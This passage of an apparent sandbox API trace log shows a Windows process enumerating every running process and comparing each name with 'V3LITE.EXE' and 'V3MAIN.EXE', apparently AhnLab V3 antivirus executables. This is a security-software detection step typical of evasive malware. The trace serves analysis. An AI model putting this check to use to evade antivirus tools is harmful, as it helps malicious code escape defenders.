returned="previous_automation_previously.exe" [0163.284] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.284] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.284] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.284] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.284] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.284] lstrlenW (lpString="english_performing.exe") returned 22 [0163.284] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.284] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="V3LITE.EXE") returned -1 [0163.284] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.285] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.285] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.285] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.285] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="V3LITE.EXE") returned -1 [0163.285] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.286] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.286] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.286] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.286] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.286] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.287] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.287] lstrlenW (lpString="volume.exe") returned 10 [0163.287] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.287] lstrcmpW (lpString1="VOLUME.EXE", lpString2="V3LITE.EXE") returned 1 [0163.287] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.287] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.287] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.287] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.287] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="V3LITE.EXE") returned -1 [0163.287] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.288] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.288] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.288] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.288] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="V3LITE.EXE") returned -1 [0163.288] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.289] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.289] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.289] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.289] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.289] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.289] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.289] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.289] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 
| out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.290] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="V3LITE.EXE") returned -1 [0163.290] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.290] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.290] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.290] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.290] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.290] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.291] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.291] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.291] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.291] lstrcmpW (lpString1="EXCEL.EXE", lpString2="V3LITE.EXE") returned -1 [0163.291] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.292] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: 
lpString1="svchost.exe") returned="svchost.exe" [0163.292] lstrlenW (lpString="svchost.exe") returned 11 [0163.292] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.292] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.292] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.292] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.292] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.292] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.293] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.293] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.293] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.293] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.293] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.293] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.293] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.294] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" 
[0163.294] lstrlenW (lpString="svchost.exe") returned 11 [0163.294] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.294] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.294] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.295] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.295] lstrlenW (lpString="svchost.exe") returned 11 [0163.295] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.295] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.295] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.295] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.295] lstrlenW (lpString="winpoint.exe") returned 12 [0163.295] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.296] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="V3LITE.EXE") returned 1 [0163.296] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.296] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.296] lstrlenW (lpString="cmd.exe") returned 7 
[0163.296] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.296] lstrcmpW (lpString1="CMD.EXE", lpString2="V3LITE.EXE") returned -1 [0163.296] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.297] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.297] lstrlenW (lpString="conhost.exe") returned 11 [0163.297] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.297] lstrcmpW (lpString1="CONHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.297] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.298] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.298] lstrlenW (lpString="PING.EXE") returned 8 [0163.298] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.298] lstrcmpW (lpString1="PING.EXE", lpString2="V3LITE.EXE") returned -1 [0163.298] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.298] CloseHandle (hObject=0xe0) returned 1 [0163.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.300] lstrcpyW (in: lpString1=0x18f8e4, lpString2="V3MAIN.EXE" | out: lpString1="V3MAIN.EXE") returned="V3MAIN.EXE" [0163.300] 
lstrlenW (lpString="V3MAIN.EXE") returned 10 [0163.300] CharUpperBuffW (in: lpsz="V3MAIN.EXE", cchLength=0xa | out: lpsz="V3MAIN.EXE") returned 0xa [0163.300] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.301] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.301] lstrlenW (lpString="[System Process]") returned 16 [0163.301] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.301] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="V3MAIN.EXE") returned -1 [0163.301] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.302] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.302] lstrlenW (lpString="System") returned 6 [0163.302] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.302] lstrcmpW (lpString1="SYSTEM", lpString2="V3MAIN.EXE") returned -1 [0163.302] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.302] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.302] lstrlenW (lpString="smss.exe") returned 8 [0163.302] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 
[0163.302] lstrcmpW (lpString1="SMSS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.302] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.303] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.303] lstrlenW (lpString="csrss.exe") returned 9 [0163.303] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.303] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.303] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.304] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.304] lstrlenW (lpString="wininit.exe") returned 11 [0163.304] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.304] lstrcmpW (lpString1="WININIT.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.304] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.305] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.305] lstrlenW (lpString="csrss.exe") returned 9 [0163.305] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.305] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3MAIN.EXE") returned 
-1 [0163.305] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.305] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.305] lstrlenW (lpString="winlogon.exe") returned 12 [0163.305] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.306] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.306] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.306] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.306] lstrlenW (lpString="services.exe") returned 12 [0163.306] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.306] lstrcmpW (lpString1="SERVICES.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.306] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.307] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.307] lstrlenW (lpString="lsass.exe") returned 9 [0163.307] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.307] lstrcmpW (lpString1="LSASS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.307] Process32NextW (in: 
hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.308] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.308] lstrlenW (lpString="lsm.exe") returned 7 [0163.308] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.308] lstrcmpW (lpString1="LSM.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.308] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.309] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.309] lstrlenW (lpString="svchost.exe") returned 11 [0163.309] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.309] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.309] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.309] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.309] lstrlenW (lpString="svchost.exe") returned 11 [0163.309] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.309] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.309] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.310] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.310] lstrlenW (lpString="svchost.exe") returned 11 [0163.310] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.310] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.310] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.311] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.311] lstrlenW (lpString="svchost.exe") returned 11 [0163.311] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.311] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.311] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.312] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.312] lstrlenW (lpString="svchost.exe") returned 11 [0163.312] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.312] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.312] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.312] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.313] lstrlenW (lpString="audiodg.exe") returned 11 [0163.313] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.313] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.313] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.313] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.313] lstrlenW (lpString="svchost.exe") returned 11 [0163.313] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") 